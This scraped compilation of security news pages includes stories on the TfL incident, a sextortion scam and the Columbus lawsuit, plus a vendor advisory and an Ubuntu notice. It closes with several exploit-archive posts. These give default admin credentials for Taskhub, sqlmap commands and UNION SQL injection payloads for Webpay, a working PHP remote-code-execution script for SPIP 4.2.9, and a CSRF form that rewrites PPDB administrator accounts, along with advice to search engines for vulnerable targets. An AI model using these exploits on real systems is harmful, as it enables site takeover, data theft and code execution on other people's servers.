Transport for London (TfL) is apparently fighting a cybersecurity incident but is rather sparing in providing details

Transport for London (TfL), the city’s transport authority, is fighting through an ongoing cyberattack. TfL runs three separate units that arrange transports on London’s surface, underground, and Crossrail transportation systems. It serves some 8 million inhabitants of the London metropolitan area.

In a public notice Transport for London stated:

> “We are currently dealing with an ongoing cyber security incident. At present, there is no evidence that any customer data has been compromised and there has been no impact on TfL services.
> 
> The security of our systems and customer data is very important to us, and we have taken immediate action to prevent any further access to our systems.”

The incident does have some impact though, as TfL took the contactless website for purchasing tickets offline for “maintenance.” This maintenance was not announced earlier though, which they likely would have done under normal circumstances.

The contactless website is used to purchase online tickets, upgrade travelcards (Oystercards), check travel history, and request refunds.

In a short thread on X, TfL said it is working with the National Crime Agency and the National Cyber Security Centre to investigate and respond to the incident.

> Hi, thanks for getting in touch. We are working to resolve this as soon as possible. We need to complete our full assessment, but there is currently no evidence that any customer data has been compromised, or impact on TfL services. We are working closely with the

> National Crime Agency and the National Cyber Security Centre to respond to the incident. We are continuing to work to assist our customers here in the usual manner. Thanks, SW.

According to security researcher Kevin Beaumont:

> “Transport for London have a genuine internal security incident running and are reverting to paper processes.”

Since TfL is keeping rather quiet about the incident it is hard to asses whether this disruption is the result of a ransomware attack or something else.

We’ll keep you posted if we learn more.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 London’s city transport hit by cybersecurity incident 

An old but persistent email scam known as "sextortion" has a new personalized touch: The missives, which claim that malware has captured webcam footage of recipients pleasuring themselves, now include a photo of the target's home in a bid to make threats about publishing the videos more frightening and convincing.

An old but persistent email scam known as “**sextortion**” has a new personalized touch: The missives, which claim that malware has captured webcam footage of recipients pleasuring themselves, now include a photo of the target’s home in a bid to make threats about publishing the videos more frightening and convincing.

This week, several readers reported receiving sextortion emails that addressed them by name and included images of their street or front yard that were apparently lifted from an online mapping application such as **Google Maps**.

The message purports to have been sent from a hacker who’s compromised your computer and used your webcam to record a video of you while you were watching porn. The missive threatens to release the video to all of your contacts unless you pay a Bitcoin ransom. In this case, the demand is just shy of $2,000, payable by scanning a QR code embedded in the email.

Following a salutation that includes the recipient’s full name, the start of the message reads, “Is visiting \[recipient’s street address\] a more convenient way to contact if you don’t take action. Nice location btw.” Below that is the photo of the recipient’s street address.

A semi-redacted screenshot of a newish sextortion scam that includes a photo of the target’s front yard.

The message tells people they have 24 hours to pay up, or else their embarrassing videos will be released to all of their contacts, friends and family members.

“Don’t even think about replying to this, it’s pointless,” the message concludes. “I don’t make mistakes, \[recipient’s name\]. If I notice that you’ve shared or discussed this email with someone else, your shitty video will instantly start getting sent to your contacts.”

The remaining sections of the two-page sextortion message (which arrives as a PDF attachment) are fairly formulaic and include thematic elements seen in most previous sextortion waves. Those include claims that the extortionist has installed malware on your computer (in this case the scammer claims the spyware is called “Pegasus,” and that they are watching everything you do on your machine).

Previous innovations in sextortion customization involved sending emails that included at least one password they had previously used at an account online that was tied to their email address.

Sextortion — even semi-automated scams like this one with no actual physical leverage to backstop the extortion demand — is a serious crime that can lead to devastating consequences for victims. Sextortion occurs when someone threatens to distribute your private and sensitive material if you don’t provide them with images of a sexual nature, sexual favors, or money.

According to the FBI, here are some things you can do to avoid becoming a victim:

\-Never send compromising images of yourself to anyone, no matter who they are — or who they say they are.  
\-Don’t open attachments from people you don’t know, and be wary of opening attachments even from those you do know.  
\-Turn off \[and/or cover\] any web cameras when you are not using them.

The FBI says in many sextortion cases, the perpetrator is an adult pretending to be a teenager, and you are just one of the many victims being targeted by the same person. If you believe you’re a victim of sextortion, or know someone else who is, the FBI wants to hear from you: Contact your local FBI office (or toll-free at 1-800-CALL-FBI).

Sextortion Scams Now Include Photos of Your Home

The City of Columbus filed a lawsuit against a researcher for trying to inform the public about the nature data stolen by a ransomware group

The City of Columbus, Ohio is suing a security researcher for sharing stolen data.

All the complaint will accomplish, we imagine, is spotlight the ignorance of certain city officials in handling a common security matter.

What happened is that the City of Columbus was attacked by a ransomware group on July 18, 2024. Due to the timing, it was at first unclear whether the disruption in the public facing services was caused by the CrowdStrike incident or if it was in fact an attack. The attack was later claimed by the Rhysida ransomware group on their leak site, where the group posts information about recent victims that are unwilling to pay.

The City of Columbus said that the city’s Department of Technology quickly identified the threat and took action to significantly limit potential exposure. Due to the swift action no systems had been encrypted, but they were looking into the possibility that sensitive data might have been stolen in the attack.

> “The city is in the process of identifying individuals whose personal information was potentially exposed and will provide notice and additional guidance to all who are impacted in the coming weeks.”

Rhysida started an auction to buy the stolen data with a starting bid of about $1.7 million in bitcoin. When that didn’t render any results, Rhysida published (please note the word “published” here, it’s important) stolen data comprising 260,000 files (3.1 TB) which was almost half of what they claimed to have, on August 8, 2024.

On that same day, the mayor of Columbus stated on local media that the disclosed information was neither valuable nor usable.

> “The fact that the threat actor’s attempted data auction failed is a strong indication that the data lacks value to those who would seek to do harm or profit from it.”

This is where an external security researcher comes in. Security researcher David Leroy Ross, aka Connor Goodwolf, shared information with the media about the content of the stolen data. From what Goodwolf shared it became clear that the data contained unencrypted personal information of city employees and residents.

So, the City of Columbus decided to sue Goodwolf for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion.

The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him interacting with the ransomware group and that it required special expertise and tools.

When all he did was use a special browser to visit a website, download a file, and disclose the nature of the data to the local press. These actions, mind you, indistinguishable from the work of many security researchers committed to stopping cyberattacks.

Take, for instance, the means of access for Goodwolf.

If you are willing to consider the Tor Browser to be a special tool, I’ll grant you that one, although grudgingly. If you are a Firefox user, you may see a big resemblance with the Tor Browser, so the browser is not really that special. If visiting a website and downloading a file is a crime, we’re all guilty of said crime. If disclosing that a public official told an untruth (even if it was out of ignorance) is wrong then you probably shouldn’t want to live in a democratic country.

But unfortunately, a Franklin County judge issued the coveted temporary restraining order barring Goodwolf from accessing, downloading, and disseminating the City’s stolen data. The order also requires the defendant to preserve all data that was downloaded to date.

We want to make absolutely clear: Rhysida stole and published the data. And it was spokespeople from The City of Columbus that told everyone not to worry about other criminals using the data for further crimes, instead of warning the people that they should be wary of phishing attempts that could leverage the stolen data against them.

****Protecting yourself after a data breach****

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 City of Columbus tries to silence security researcher 

Vivavis HIGH-LEIT versions 4 and 5 allow attackers to execute arbitrary code as local system on systems where the "HL-InstallService-hlxw" or "HL-InstallService-hlnt" Windows service is running. Authentication is necessary for successful exploitation. The execution of the exploit is trivial and might affect other systems if the applications folder is shared between multiple systems in which case the vulnerability can be used for lateral movement.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2024-001: Privilege Escalation via Service Binary   
Hijacking in Vivavis HIGH-LEIT

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2024-38456

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2024-001/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2024-001.txt

Affected products/vendor  
========================

HIGH-LEIT by VIVAVIS AG[0]. Version 4 and 5 are different product lines,   
both are affected:

HIGH-LEIT 4 Version 4.25.00.00 to 4.25.01.01 (patch available)  
HIGH-LEIT 5 Version = 5.08.01.03 (no patch available, planned for   
31.10.2024)

Summary  
=======

HIGH-LEIT is a scalable SCADA network control system designed for   
infrastructure applications in the energy, water supply, wastewater, and   
environmental sectors, as well as associated utilities and industrial   
applications. HIGH-LEIT is used for operational networks in critical   
infrastructure.  
The Windows services "HL-InstallService-hlnt" for HIGH-LEIT Version 4   
and "HL-InstallService-hlxw" for Version 5 allow for an authenticated   
attackers in the Active Directory group "HL-TS-Gruppe" to escalate their   
privileges to local system.

Risk  
====

The vulnerability allows attackers to execute arbitrary code as local   
system on systems where the "HL-InstallService-hlxw" or   
"HL-InstallService-hlnt" Windows service is running. Authentication is   
necessary for successful exploitation. The execution of the exploit is   
trivial and might affect other systems if the applications folder is   
shared between multiple systems in which case the vulnerability can be   
used for lateral movement.

Description  
===========

During a penetration test, SCHUTZWERK tested a terminal server part of   
an internal OT Network. The software HIGH-LEIT 5 was found to be   
installed on this terminal server.

HIGH-LEIT 5 has a windows service named "HL-InstallService-hlxw", that   
runs as local system with start mode "autostart". By default, for   
affected versions, the executable "D:\hlxw\update\bin\prunsrv.exe" is   
modifiable by the Active Directory group "HL-TS-Gruppe". The granted   
modify permission on "D:\hlxw\update\bin\prunsrv.exe" is inherited from   
the modify permission on the folder "D:\hlxw". The Active Directory   
group "HL-TS-Gruppe" is needed for every user interacting with the   
HIGH-LEIT software. This means this exploit is available from any   
HIGH-LEIT user with low privileges (e.g. auditors with read-only   
permissions). The user can modify the executable "prunsrv.exe" and wait   
for or force a system reboot. Afterwards the modified "prunsrv.exe" is   
executed as local system on the server.

Solution/Mitigation  
===================

For HIGH-LEIT Version 4:  
- - Update to version 4.25.01.02 or newer, or  
- - apply the vendors workaround via GPO to mitigate the vulnerability, or  
- - manually remove the modify permission of the Active Directory group   
"HL-TS-Gruppe" on the folder "D:\hlnt".

For HIGH-LEIT Version 5:  
- - Update to version 5.8.01.04 (release planned for 31.10.24), or  
- - apply the vendors workaround via GPO to mitigate the vulnerability, or  
- - manually remove the modify permission of the Active Directory group   
"HL-TS-Gruppe" on the folder "D:\hlxw".

Disclosure timeline  
===================

2024-05-14: Vulnerability discovered  
2024-05-14: Vulnerability reported and presented to affected customer  
2024-05-16: Vulnerability presented to vendor  
2024-05-16: Vulnerability details reported to vendor  
2024-05-17: Vendor started working on patch  
2024-05-22: Vendor started deploying workaround to customers  
2024-06-05: Green light from customer for Advisory  
2024-06-13: Patch for HIGH-LEIT 4 finished  
2024-06-13: Meeting with vendor to plan disclosure/patch release  
2024-06-14: CVE-2024-38456 reserved  
2024-08-16: Vendor finished deployment of patch/workaround for all   
affected customers  
2024-08-16: Meeting with vendor to plan disclosure  
2024-08-23: Meeting with vendor to plan disclosure  
2024-09-02: Disclosure by SCHUTZWERK  
2024-09-02: Disclosure by vendor at   
https://www.vivavis.com/service/it-security-bulletin/

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Lukas Krieg   
(lkrieg@schutzwerk.com) of SCHUTZWERK GmbH.

References  
==========

[0] https://www.vivavis.com/loesung/leittechnik/high-leit/  
[1] https://www.vivavis.com/service/it-security-bulletin/

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmbVfC0aHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvLwhAAmq8ALbZdWarhHZGgPAMJ  
5mU/24qCCY5M3roi4zBv9GFzSbJVF4TdgpceOkyrCYHtTZWGEYdc8ewd6DLarweH  
Kcj+KyCA6JIbb94E2CVrDAXgpjJWsvG1CSvHax+erG/FppEk/ud9t+DJhCSVbkMT  
KeqTz1G02tpKnHVgd2ogVF9ydJVdEcV4QJD/tkUfQukWomIGNRt+JNoxcCv362H1  
fk3uVghrXxWeo3P0oDvWg4S2+3IEZPPtW1PCqfo9SFO2Ll7xF/2015Hl1Sn0TOAA  
y4JJqDNOwIN5hIP6JvIs+W6uLLU3IGFUEWg1CiplOY3CC1kfEorQtvsDamNq9QWF  
2r6CaWNN2FYpHkiEygYJsnn8Z3vzqqQQnaym2mwlsxe0ggutADCg2FbkybqTUF+D  
fUGoQjaq7eojUTGS7fgNlOUua2euImjv9NMpzg00yMb6os6P+HetT+fv2G67TLKS  
ptqQ73H+On4h2DP/DPkF1q7hBBZtT1I2Xx6er65AtSKjwOsLBOWSR1BNW+QJ/D56  
pPhYHR+lVakHO/TMzILys5dPSXY3TU1iX0XpgvddIqONgViMR54a5MV/Vv1lL9xb  
qEcGtqtX84cg74vQuwUbl69pP+69Y+ACDoBdaemRex1tjR6seFBI27XRsn+E8a+a  
kQGdwKyB2qT0UNuLyFhcVi4=  
=3K1g  
-----END PGP SIGNATURE-----  
--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm /  HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Vivavis HIGH-LEIT 4 / 5 Privilege Escalation

The No cON Name 2024 call for papers has been announced. It will be held in Barcelona, Spain, from November 18th through the 20th, 2024.

    ************************************************  Call For Papers NcN 2k24 ***************************************************ph3ar disinformation and cognitive controlhttps://www.noconname.org/call-for-papers/Exact place not disclosed until a few weeks before due celebration.     * INTRODUCTIONThe organization has  opened CFP proposals. No cON Name is the eldest Hacking and Security Conference in Span. Our goal is to get highly qualified requests for both, speaker opportunities, as well as workshops, to show in  one of  the most  respected hacker conferences in   Barcelona and Spain, NcN (No cON Name). We will cellebrate as the last edition, 2 tracks:  * Privacy and net neutrality Track. (November 18th)  * Cybersecurity Track (November 19-20th)We will be accepting exclusively technical  presentations, proof of concept for, private  investigations  and  solutions  for  professionals   related  to the  IT security scene. Under no circumstance we will be selecting any proposal which is commercially targeted, our main goal is to share knowledge in a well-established community.     * FORMAT & REQUIREMENTS   - Language: English ( We will choose almost 75% ) or Spanish   - Proposal file type: PDF. It must follow  documentations requirements, shown     in next paragraph, and filled in through the web site.   - Please use the template provided for the presentations during the conference   - It's necessary to  deeply explain contents, as this document  will allow the     organization to evaluate the proposal.   - CFP's attachment  requested is mandatory. One page  summary of the contents,     or the investigations that you want to show will help to demonstrate techni-     cally the findings/result of investigations (additional texts, screenshots, evidences, code, etc)     WE DON'T ACCEPT PROPOSALS PRESENTED IN SPAIN BEFORE THE NOCONNAME'S CONGRESS DATE.In the event  that the  proposal  is accepted, it must be  submitted before the deadline (detailed in the important dates section below):   - An  article (a  template  in doc, odt  format  is  attached.) that will be delivered in the conferences notebook. MANDATORY   - Presentation and exhibition  material: All the material     that will be  presented to the organization  must be delivered, otherwise it will be possible to  grant other applicants your place. You have to plan the day of the event nimbly. MANDATORY     * CONTENTSWe will require the following info to review your CFP:DATA                         DESCRIPTIONPreferred contact method     Alias, email, X account, Telegram, Signaletc.  Name & Surname*  Alias *  Email *  Phone nº *  X, Telegram, Signal id  City/Country of residence *Proposal  Proposal type *             Speaking presentation or Workshop presentation  Representing *              Individual or company name  Category *                  See: RELEVANT TOPICS  Length (minutes) *          Speaker (presentation):Between 20 or 45            minutes.                              Workshop (presentation + demo):  45 minutes                              or 1,5 hours.  Title of the paper *:       Presentation's / Workshops Title  Goal*                      State  your objectives  during your investigation,                              issues encountered, impact on the society including                              risks.  Benefits*                  List  the   benefits  your   presentation                 will  be                              providing to the security community, social impact,                              and perhaps solutions to the current issue.  Description *               Presentation's / Workshop's description  Speaker's Biography *       Brief bio of latest published papers, previous talk                              experience, your current interests.     * RELEVANT TOPICSThe areas of interest that have been proposed, not restricted to, are:   - Offensive security.   - Evading / In-depth research of Phishing / Malware.   - Security & exploiting SCADA / ICS.   - Internet privacy and net neutrality (EPIC).   - Honeypots / Honeynets.   - Web explorers' security.   - Hardware hacking.   - New vulnerabilities and 0-day exploits.   - Healthcare sucurity / risks   - (in)Security in the automotive industry   - Software Testing/Fuzzing.   - Advanced Penetration testing techniques.   - Mobile Application Security-Threats and Exploits.   - Network and Router Hacking   - Mobile, Satellite, IP networks security   - SDR (Software defined radio)   - Hacking virtualized envirorments   - Computer/electronic forensics   - Bluetooth vulnerabilities.   - Videconference application vulnerabilities.     * DEADLINES   - CFP Requests closing: October 15th 2024.   - CFP Approval: October, 20th 2024.   - Materials presentation due: November, 1st  2024   - (Cybersecurity Track) Conference's date: November, 19th,20th 2024     * SENDING YOUR CFP   All requests must be submitted through our site at:   https://www.noconname.org/call-for-papers/   Fill in the form  and upload necessary files and you are  all set (some parts of website are in spanish)     - EVALUATION CRITERIA FOR PROPOSALSWe will be evaluating speaking  conference and workshop requests with the following score:   - Level  of  innovation  in  your  investigation / Sophistication  of the  40% presentation   - Stating your key-points of your proposal without going deep into detail 20%   - Briefing quality of your draft (proof of concept in  briefing is highly 15% appreciated)   - State field where your investigation  was made, ie:hardware, software, 10% industry.   - Your speaking reputation 10%   - Relevant topic proposed by the No cON Name staff 5%

No cON Name 2024 Call For Papers

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

**Taskhub 2.8.8 Insecure Settings**

Posted Sep 3, 2024

Authored by indoushka

Taskhub version 2.8.8 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 2c385d7b29ff2d1f0cadb673bff0447f2a27c839cc502710002b3eab58740544

Download | Favorite | View

**Taskhub 2.8.8 Insecure Settings**

    =============================================================================================================================================| # Title     : Taskhub v2.8.8 Insecure Settings Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 12345678[+] https://www/127.0.0.1/tasks.octalfoxcom/auth/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,625)
*   Arbitrary (17,028)
*   BBS (2,859)
*   Bypass (1,898)
*   CGI (1,047)
*   Code Execution (7,868)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,420)
*   DoS (25,190)
*   Encryption (2,389)
*   Exploit (54,101)
*   File Inclusion (4,271)
*   File Upload (1,007)
*   Firewall (822)
*   Info Disclosure (2,911)
*   Intrusion Detection (916)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,252)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,205)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,399)
*   Protocol (3,745)
*   Python (1,652)
*   Remote (31,810)
*   Root (3,668)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,035)
*   Shell (3,295)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,291)
*   SQL Injection (16,693)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (671)
*   Vulnerability (33,048)
*   Web (10,128)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,278)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,114)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,006)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,685)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,797)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,757)
*   Other

Taskhub 2.8.8 Insecure Settings

Webpay E-Commerce version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 SQL Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : catproduct.php?catpro=6[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] Parameter: catpro (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: catpro=6' AND 5853=5853-- KEle    Type: UNION query    Title: Generic UNION query (NULL) - 15 columns    Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 SQL Injection

SPIP version 4.2.9 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.9 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://example/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.9 Code Execution

Ubuntu Security Notice 6984-1 - It was discovered that WebOb incorrectly handled certain URLs. An attacker could possibly use this issue to control a redirect or forward to another URL.

==========================================================================  
Ubuntu Security Notice USN-6984-1  
September 02, 2024

python-webob vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

WebOb could be made to redirect of forward to undesired URLs.

Software Description:  
- python-webob: Python module providing WSGI request and response objects

Details:

It was discovered that WebOb incorrectly handled certain URLs.  
An attacker could possibly use this issue to control a redirect or  
forward to another URL.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python3-webob                   1:1.8.7-1ubuntu0.1.24.04.1

Ubuntu 22.04 LTS  
  python3-webob                   1:1.8.6-1.1ubuntu0.1

Ubuntu 20.04 LTS  
  python3-webob                   1:1.8.5-2ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6984-1  
  CVE-2024-42353

Package Information:  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.7-1ubuntu0.1.24.04.1  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.6-1.1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/python-webob/1:1.8.5-2ubuntu0.1

Ubuntu Security Notice USN-6984-1

PPDB version 2.4-update 6118-1 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : ppdb v2.4-update 6118-1 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://drive.usercontent.google.com/download?id=1gnVS8xLA-884e7M8V5dc3_i9qNgrviVq&export=download&authuser=0               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 10. Set the target website link Save changes and apply . 

[+] infected file : /root/psb-user-update.php.

[+] save code as poc.html 

[+] payload : 

<div class="col-lg-6">  
                <h2 class="page-header">Administrator</h2>  
                    <div class="panel panel-default">  
                        <div class="panel-heading">  
                            User Profile   
                        </div>  
                          
                        <div class="panel-body">  
                            <div class="table-responsive">  
                <form role="form" method="post" action="http://127.0.0.1/ppdb/root/psb-user-update.php" enctype="multipart/form-data">  
                                <table class="table table-striped table-bordered table-hover">

                                                                      <tbody>

                             <tr>    
                    <td>Username</td>  
                    <td><input class="form-control" type="text" name="username" value="indoushka" required="">  
                    <input class="form-control" type="hidden" name="id" value="1"></td>  
                    </tr>

                    <tr>  
                    <td>Password</td>  
                    <td><input class="form-control" type="password" name="password" id="password" required=""></td>  
                    </tr>  
                    <tr>  
                    <td>Nama</td>  
                    <td><input class="form-control" type="nama" name="nama" id="nama" value="nekkaa salah eddine" required=""></td>  
                    </tr>

                    <tr>  
                    <td>Email</td>  
                    <td><input class="form-control" type="text" name="email" value="indoushka4ever@gmail.com" required="">  
                    <input type="hidden" name="level" id="level" value="1">  
                    </td>  
                    </tr>  
                    <tr>  
<td colspan="3"><input type="file" name="foto" id="foto" required=""></td>  
</tr>

                                            </tbody>  
                                </table>  
                                <button type="submit" class="btn btn-primary" name="update" id="update">Update</button>  
                                </form>  
                            </div>  
                              
                        </div>  
                          
                    </div>  
                      
                </div>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Tag

#web